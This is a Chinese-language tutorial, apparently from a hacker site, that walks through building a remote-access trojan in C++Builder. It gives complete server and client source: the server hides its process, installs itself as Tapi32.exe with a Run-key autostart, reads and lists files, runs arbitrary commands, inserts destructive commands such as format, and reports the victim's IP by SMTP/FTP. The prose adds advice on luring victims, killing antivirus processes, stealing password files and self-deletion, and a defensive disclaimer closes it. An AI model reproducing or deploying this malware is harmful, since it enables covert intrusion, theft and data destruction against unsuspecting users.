木马是如何编写的 FROM HACKBASE

 

陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！要知道，木马（Trojan）的历史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess（）函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion（）;

// 得到操作系统的版本号

if （dwVersion >= 0x80000000）

// 操作系统是Win9x，不是WinNt

{

typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;

//定义RegisterServiceProcess（）函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary（"KERNEL32"）;

//加载RegisterServiceProcess（）函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;

//得到RegisterServiceProcess（）函数的地址

lpRegisterServiceProcess（GetCurrentProcessId（）,1）;

//执行RegisterServiceProcess（）函数,隐藏本进程

FreeLibrary（hDLL）;

//卸载动态链接库

}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。

接着再将自己拷贝一份到%System%目录下，例如：C:/Windows/System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

//定义一个变量

GetSystemDirectory（TempPath ,MAX_PATH）;

//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString（TempPath）;

//格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"//Tapi32.exe"）.c_str（） ,FALSE）;

//将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

//定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry->RootKey=HKEY_LOCAL_MACHINE;

//设置主键为HKEY_LOCAL_MACHINE

Registry->OpenKey（"Software//Microsoft//Windows//

CurrentVersion//Run",TRUE）;

//打开键值Software//Microsoft//Windows//CurrentVersion//Run，如果不存在，就创建之

try

{

//如果以下语句发生异常，跳至catch，以避免程序崩溃

if（Registry->ReadString（"crossbow"）!=SystemPath+"//Tapi32.exe"）

Registry->WriteString（"crossbow",SystemPath+"//Tapi32.exe"）;

//查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

//如果不是，就写入以上键值和内容

}

catch（...）

{

//如果有错误，什么也不做

}

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

//定义了一堆待会儿要用到的变量

sprintf（TempFile, "%s", AnsiString（SystemPath+AnsiString（"//Win369.BAT"））.c_str（））;

//在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket->ReceiveText（）;

//接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{

if（temp.SubString（0,9）=="edit conf"）

//如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length（）;

//得到字符串的长度

int file_name=atoi（（temp.SubString（11,1））.c_str（））;

//将第11个字符转换成integer型，存入file_name变量

//为什么要取第11个字符，因为第10个字符是空格字符

content=（temp.SubString（12,number-11）+'/n'）.c_str（）;

//余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL;

char filename[20];

chmod（"c://autoexec.bat",S_IREAD|S_IWRITE）;

chmod（"c://config.sys",S_IREAD|S_IWRITE）;

//将两个目标文件的属性改为可读可写

if（file_name==1）

sprintf（filename,"%s","c://autoexec.bat"）;

//如果第11个字符是1,就把Autoexec.bat格式化

else if（file_name==2）

sprintf（filename,"%s","c://config.sys"）;

//如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

//定义计数器

while（fp==NULL）

{

//如果指针是空

fp=fopen（filename,"a+"）;

//如果文件不存在，创建之；如果存在，准备在其后添加

//如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已经试了100次了，仍未成功

Socket->SendText（"Fail By Open File"）;

//就发回“Fail By Open File”的错误信息

goto END;

//跳至END处

}

}

fwrite（content,sizeof（char）,strlen（content）,fp）;

//写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

fclose（fp）;

//写完后关闭目标文件

Socket->SendText（"Sucess"）;

//然后发回“Success”的成功信息

}

}

你现在可以通过网络来察看目标机上的这两个文件了，并且还可以向里面随意添加任何命令。呵呵，这只不过是牛刀小试罢了。朋友，别走开

这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲啰：

{

else if（temp.SubString（0，3）=="dir"）

{

//如果前3个字符是“dir”

int Read_Num;

char * CR_LF="/n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length（）;

//得到字符串的长度

AnsiString Dir_Name=temp.SubString（5，number-3）;

//从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if（Dir_Name==""）

{

//如果目录名为空

Socket->SendText（"Fail By Open DIR's Name"）;

//返回“Fail By Open DIR's Name”信息

goto END;

//跳到END

}

char * dirname;

dirname=Dir_Name.c_str（）;

if （（dir = opendir（dirname）） == NULL）

{

//如果打开目录出错

Socket->SendText（"Fail by your DIR's name!"）;

//返回“Fail By Your DIR's Name”信息

goto END;

//跳到END

}

times_of_try=0;

while（fp==NULL）

{

//如果指针是NULL

fp=fopen（TempFile，"w+"）;

//就创建system/Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已经试了100次了，仍未成功（真有耐心！）

Socket->SendText（"Fail By Open File"）;

//就发回“Fail By Open File”的错误信息

goto END;

//并跳到END处

}

}

while （（ent = readdir（dir）） != NULL）

{

//如果访问目标目录成功

if（*（AnsiString（dirname））.AnsiLastChar（）!='//'）

//如果最后一个字符不是“/”，证明不是根目录

filename=（AnsiString（dirname）+"//"+ent->d_name）.c_str（）;

//加上“/”字符后将指针指向目录流

else

filename=（AnsiString（dirname）+ent->d_name）.c_str（）;

//如果是根目录，则不用加“/”

attrib=_rtl_chmod（filename， 0）;

//得到目标文件的访问属性

if （attrib & FA_RDONLY）

//“&”字符是比较前后两个变量，如果相同返回1，否则返回0

fwrite（" R"，sizeof（char），3，fp）;

//将目标文件属性设为只读

else

fwrite（" "，sizeof（char），3，fp）;

//失败则写入空格

if （attrib & FA_HIDDEN）

fwrite（"H"，sizeof（char），1，fp）;

//将目标文件属性设为隐藏

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_SYSTEM）

fwrite（"S"，sizeof（char），1，fp）;

//将目标文件属性设为系统

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_ARCH）

fwrite（"A"，sizeof（char），1，fp）;

//将目标文件属性设为普通

else

fwrite（" "，sizeof（char），1，fp）;

//失败则写入空格

if （attrib & FA_DIREC）

fwrite（"

"，sizeof（char），9，fp）;

//将目标文件属性设为目录

else

fwrite（" "，sizeof（char），9，fp）;

//失败则写入空格

fwrite（ent->d_name，sizeof（char），strlen（ent->d_name），fp）;

//将目录名写入目标文件

fwrite（CR_LF，1，1，fp）;

//写入换行

}

fclose（fp）;

//关闭文件

closedir（dir）;

//关闭目录

FILE *fp1=NULL;

times_of_try=0;

while（fp1==NULL）

{

fp1=fopen（TempFile，"r"）;

//打开Win369.bat准备读

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已经试了100次了，仍未成功

Socket->SendText（"Fail By Open File"）;

//就发回“Fail By Open File”的错误信息

goto END;

//并跳到END处

}

}

AnsiString Return_Text="";

char temp_content[300];

for（int i=0;i<300;i++） temp_content='/0';

//定义的一个空数组

Read_Num=fread（temp_content，1，300，fp1）;

//从目标文件中读入前300个字符

while（Read_Num==300）

{

Return_Text=Return_Text+temp_content;

//Return_Text变量加上刚才的300个字符

for（int i=0;i<300;i++） temp_content='/0';

Read_Num=fread（temp_content，1，300，fp1）;

//重复

};

Return_Text=Return_Text+temp_content;

//Return_Text变量加上刚才的300个字符

fclose（fp1）;

//关闭目标文件

Socket->SendText（Return_Text）;

//返回Return_Text变量的内容

}

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if（temp.SubString（0，4）=="type"）

{

//如果前4个字符是“type”

int Read_Num;

int number=temp.Length（）;

AnsiString File_Name=temp.SubString（6，number-4）;

//将目标文件流存入File_Name变量中

times_of_try=0;

while（fp==NULL）

{

fp=fopen（File_Name.c_str（），"r"）;

//打开目标文件准备读

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已试了100次了

Socket->SendText（"Fail By Open File"）;

//返回“Fail By Open File”的错误信息

goto END;

//跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for（int i=0;i<300;i++） temp_content='/0';

//定义一个空数组

Read_Num=fread（temp_content，1，300，fp）;

//从目标文件中读入前300个字符

while（Read_Num==300）

{

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

for（int i=0;i<300;i++） temp_content='/0';

Read_Num=fread（temp_content，1，300，fp）;

//重复

};

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

fclose（fp）;

//关闭目标文件

Socket->SendText（Return_Text）;

//返回Return_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧——操纵目标机的光驱（注意：mciSendString（）函数的声明在mmsystem.h头文件中）：

{

else if（temp=="open"）

{

//如果收到的temp的内容是“open”

mciSendString（"set cdaudio door open"， NULL， 0， NULL）;

//就弹出光驱的托盘

}

else if（temp=="close"）

{

//如果收到的temp的内容是“close”

mciSendString（"Set cdaudio door closed wait"， NULL， 0， NULL）;

//就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if（temp=="swap"）

{

SwapMouseButton（1）;

//交换鼠标左右键，简单吧？

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x——NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if（temp=="reboot"）

{

//如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion（）;

//得到操作系统的版本号

if （dwVersion < 0x80000000）

{

//操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

//定义变量

OpenProcessToken（GetCurrentProcess（），TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY， &hToken）;

//OpenProcessToken（）这个函数的作用是打开一个进程的访问令牌

//GetCurrentProcess（）函数的作用是得到本进程的句柄

LookupPrivilegeValue（NULL， SE_SHUTDOWN_NAME，&tkp.Privileges[0].Luid）;

//LookupPrivilegeValue（）的作用是修改进程的权限

tkp.PrivilegeCount = 1;

//赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges（hToken， FALSE， &tkp， 0，（PTOKEN_PRIVILEGES）NULL， 0）;

//AdjustTokenPrivileges（）的作用是通知Windows NT修改本进程的权利

ExitWindowsEx（EWX_REBOOT | EWX_FORCE， 0）;

//强行退出WinNt并重启

}

else ExitWindowsEx（EWX_FORCE+EWX_REBOOT，0）;

//强行退出Win9x并重启

}

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

//如果都不是

char * CR_TF="/n";

times_of_try=0;

while（fp==NULL）

{

fp=fopen（TempFile，"w+"）;

//创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

Socket->SendText（"Fail By Open File"）;

//返回“Fail By Open File”的信息

goto END;

//跳到END

}

}

fwrite（temp.c_str（），sizeof（char），strlen（temp.c_str（）），fp）;

//写入欲执行的命令

fwrite（CR_TF，sizeof（char），strlen（CR_TF），fp）;

//写入换行符

fclose（fp）;

//关闭Win369.bat

system（TempFile）;

//执行Win369.bat

Socket->SendText（"Success"）;

//返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。

到此，服务器程序的功能已全部完成，但还差容错部分未完成，这样才能避免程序因意外而崩溃。朋友，别走开！（

但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

Socket-〉Close（）;

//关闭服务

ServerSocket1-〉Active =true;

//再次打开服务

if （NMSMTP1-〉Connected） NMSMTP1-〉Disconnect（）;

//如果SMTP服务器已连接则断开

NMSMTP1-〉Host = "smtp.163.net";

//选一个好用的SMTP服务器，如163、263、sina和btamail

NMSMTP1-〉UserID = "";

//你SMTP的ID

try

{

NMSMTP1-〉Connect（）;

//再次连接

}

catch（...）

{

goto NextTime;

//跳到NextTime

}

NMSMTP1-〉PostMessage-〉FromAddress ="I don't know!";

//受害者的Email地址

NMSMTP1-〉PostMessage-〉FromName = "Casualty";

//受害者的名字

NMSMTP1-〉PostMessage-〉ToAddress-〉Text = "crossbow@8848.net";

//将信发到我的邮箱，这一步很关键

NMSMTP1-〉PostMessage-〉Body-〉Text = AnsiString（"Server Running on:"） + NMSMTP1-〉LocalIP ;

//信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1-〉PostMessage-〉Subject = "Server Running Now!";

//信的主题

NMSMTP1-〉SendMail（）;

//发送！

return;

//返回

NextTime:

NMFTP1-〉Host = "ftp.go.163.com";

//你的FTP服务器的地址

NMFTP1-〉UserID = "";

//你的用户ID

NMFTP1-〉Port = 21;

//FTP端口号，一般为21

NMFTP1-〉Password = "";

//你的FTP的密码

if（NMFTP1-〉Connected） NMFTP1-〉Disconnect（）;

//如果已连接就断开

try

{

NMFTP1-〉Connect（）;

//再连接

}

catch（...）

{

return;

//返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1-〉RemoteIP;

//受害者的IP地址

FILE * Upload;

Upload = fopen（NMFTP1-〉RemoteIP.c_str（）,"w+"）;

//创建一个新文件准备写，如果已存在就覆盖

fwrite（SendToSite.c_str（）,sizeof（char）,SendToSite.Length（）,Upload）;

//写入以上的SendToSite的内容

fclose（Upload）;

//写完后关闭此文件

NMFTP1-〉RemoveDir（"public_html"）;

//删除public_html目录

NMFTP1-〉Upload（NMFTP1-〉RemoteIP, NMFTP1-〉RemoteIP）;

//上传！

}

啊，超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件：

#include 〈stdlib.h〉

#include 〈dirent.h〉

#include 〈fcntl.h〉

#include 〈dos.h〉

#include 〈sys/stat.h〉

#include 〈winbase.h〉

#include 〈stdio.h〉

#include 〈process.h〉

#include 〈io.h〉

#include 〈mmsystem.h〉

至此，服务器端（Server）程序已全部完工！（终于可以好好歇歇了！）别慌！以上代码只是完成了整个木马程序的一半。（“扑通”，有人晕倒了！）下面我们就将乘胜追击——搞定客户端程序（Client）！

客户端程序其实是很简单的。另新建一个Form，添加一个ClientSocket（和ServerSocket在相同的页下），再添加四个Editbox，命名为Edit1，Edit2，Edit3和Edit4，最后添加一个Button，Caption为“发送”。Edit1是输入命令用的，Edit2是准备输入目标机的IP地址用的，Edit3是输入连接端口号用的，Edit4是用来输入欲添加的语句或显示命令执行的结果的。（头是不是有点大了？！）

双击Button1，在Button1Click事件中添加如下代码：

{

if（（Edit2-〉Text==""）||（Edit3-〉Text==""））return;

//如果输入IP地址框或输入端口号框有一个为空，就什么也不作

ClientSocket1-〉Address=Edit2-〉Text;

//目标IP地址

ClientSocket1-〉Port=atoi（Edit2-〉Text.c_str（））;

//目标端口号，本例中的44444

ClientSocket1-〉Open（）;

//连接！

}

选中CilentSocket1控件，双击OnConnectt事件，在ClientSocket1Connect下添加如下代码：

{

if（（Edit1-〉Text=="edit conf 1"）||（Edit1-〉Text=="edit conf 2"））

//如果是要编辑autoexec.bat或config.sys

Socket-〉SendText（Edit1-〉Text+Edit4-〉Text）;

//发送命令和欲添加的语句

else

Socket-〉SendText（Edit1-〉Text）;

//否则只发送命令

}

双击OnRead事件，在ClientSocket1Read下添加如下代码：

{

AnsiString ReadIn = Socket-〉ReceiveText（）;

//读入收到的返回信息

Edit4-〉Text="";

//清空编辑框

FILE *fp;

fp = fopen（"ReadIn.tmp","w"）;

//建立一个临时文件ReadIn.tmp

fwrite（ReadIn.c_str（）,1,10000,fp）;

//写入信息

fclose（fp）;

//关闭之

Edit4-〉Lines-〉LoadFromFile（"ReadIn.tmp"）;

//在编辑框中显示返回的信息

}

为了敲完命令后直接回车就可以发送，我们可以使Button1的代码共享。双击Edit1的OnKeyPress命令，输入：

{

if（Key==VK_RETURN）Button1Click（Sender）;

//如果敲的是回车键，就和点击Button1一样的效果

}

最后再添加以下头文件：

#include "stdlib.h"

#include "winbase.h"

#include "fcntl.h"

#include "stdio.h"

终于写完了！！！（如果你对简陋的界面不满意，可以自己用BCB中丰富的控件好好完善完善嘛！）按下Ctrl+F9进行编译链接吧！对于Server，你可以选一个足以迷惑人的图标（我选的是一个目录模样的图标）进行编译，这样不但受害者容易中招，而且便于隐藏自己。

接下来就把Server程序寄给受害者，诱骗他（她）执行，在你得到他（她）的IP后（这不用我教吧？），就启动Client程序，敲入“edit conf 1”就编辑Autoexec.bat文件，敲入“edit conf 2”就编辑Config.sys文件，敲入“dir xxx”（xxx是目录名）就可以看到目录和文件，敲“type xxx”就可以察看任何文件，输入“open”，弹出目标机的光驱托盘，“close”就收入托盘，输入“swap”就可以交换受害者的鼠标左右键，输入“reboot”就启动目标机……不用我多说了吧？

以上只是一个简单的例子，真正写起木马来要解决的技术问题比这多得多，这得需要扎实的编程功底和丰富的经验。如下的问题就值得仔细考虑：

首先是程序的大小问题，本程序经编译链接后得到的可执行文件竟有400多K，用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的；并且尽量由自己调用底层的API函数，而尽量少使用Borland打好包的VCL控件；要尽量使用汇编语言（BCB支持C++和汇编混编），不但速度会加快，而且大小可以小很多，毕竟木马是越小越好。

还有启动方式的选择。出了Win.ini、System.ini之外，也还是那几个注册表键值，如：

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run

HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/

RunServices

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run

都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了（如冰河和广外女生）。这里涉及到参数传递的问题。得到ParamStr（）函数传来的参数，启动自己后再启动与之关联的程序，并将参数传递给它，这样就完成了一次“双启动”，而受害者丝毫感觉不到有任何异常。具体键值如：

与exe文件建立关联：HKEY_CLASSES_ROOT/exefile/shell/open/command

与txt文件建立关联：HKEY_CLASSES_ROOT/txtfile/shell/open/command

与dll文件建立关联：HKEY_CLASSES_ROOT/dllfile/shell/open/command

等，当然还可以自己扩充。目前还有一种新方法：在

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion

/Windows

下添加如下键值 "AppInit_DLLs"="Server.dll"，这就把Server.dll注册为系统启动时必须加载的模块（你应该把木马编译成DLL）。下次开机时，木马以动态链接库形式被加载，存在于系统进程中。因为没有它自己的PID（Process ID 进程识别号），所以在NT的任务管理器中也看不见（不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的），这样做的目的是可以使自己的程序更加隐蔽，提高木马的生存能力。

木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件，截图存为jpg文件传回，录音监听成Wav文件，录像成AVI文件，弹光驱，读软驱，关机，重启，不停地挂起，胡乱切换分辨率（烧掉你的显示器），发对话框，不停地打开资源管理器直到死机，杀掉Kernel32.dll进程使机器暴死，交换鼠标左右键，固定鼠标，限制鼠标活动范围，鼠标不听指挥到处乱窜，记录击键记录（记录上网口令，这需要深入了解钩子（Hook）技术，如键盘钩子和鼠标钩子），窃取重要的密码文件如pwl和sam文件，格式化磁盘，乱写磁盘扇区（像病毒大爆发），破坏零磁道，乱写BIOS（像CIH），胡乱设置CMOS，加密MBR、HDPT和FAT（像江民炸弹）……真是琳琅满目、心狠手辣呀！而且实现起来并不是很复杂，只不过后面几项需要比较扎实的汇编功底而已（有几项要用到Vxd技术）。唉！路漫漫其修远兮，吾将上下而求索……

如果你想更安全地执行你的入侵活动，就应该像广外女生一样可以杀掉防火墙和杀毒软件的进程。防火墙和杀毒软件监视的是特征码，如果你是新木马，它就不吱一声；但是如果你打开不寻常的端口，它就会跳出来报警。因此最好的办法是启动后立即分析当前进程，查找有没有常见防火墙和杀毒软件的进程，如果有就杀无赦。比如常见的如：Lockdown，天网防火墙，网络卫兵，kv3000，瑞星，金山毒霸，Pc-Cillin，Panda，Mcafee，Norton和CheckPoint。杀掉后，再在特定的内存地址中作一个标记，使它们误以为自己已启动，因此不会再次启动自己了。

针对来自反汇编工具的威胁。如果有人试图将你的木马程序反汇编，他成功后，你的一切秘密就暴露在他的面前了，因此，我们要想办法保护自己的作品。首先想到的是条件跳转，条件跳转对于反向工程来说并不有趣。没有循环，只是跳转，作为使偷窃者令人头痛的路障。这样，就没有简单的反向操作可以执行了。陷阱，另一个我不太肯定，但听说有程序使用的方法：用CRC校验你的EXE文件，如果它被改变了，不要显示典型错误信息，而给予偷窃者致命的一击。

最后如果你需要它完成任务后可以自己删除自己，我提示你：退出前建立一个批处理文件，加入循环删除本exe文件和本批处理文件自己的命令后保存，执行它，再放心地退出。你可以试一下，所有文件都消失了吧？！这叫“踏雪无痕”。

入侵安装了防火墙的机器最好使用自己编写的木马，这样不光防火墙不会报警，而且你自己心里也坦然一些——毕竟是自己的作品吗！如果你是系统管理员，那就请你不要偷懒，不仅要经常扫描1024以下的端口，而且包括1024以上的高端端口也要仔细扫描，65535个端口一个也不能漏。因为许多木马打开的就是高端端口（如本例中的4444）。

写在最后：上面例子的用意并不是教你去如何攻击他人，目的只是让你了解木马的工作原理和简单的编写步骤，以便更好地防范和杀除木马，维护我们自己应有的网络安全。因此，请列位看官好自为之，不要乱下杀手啊！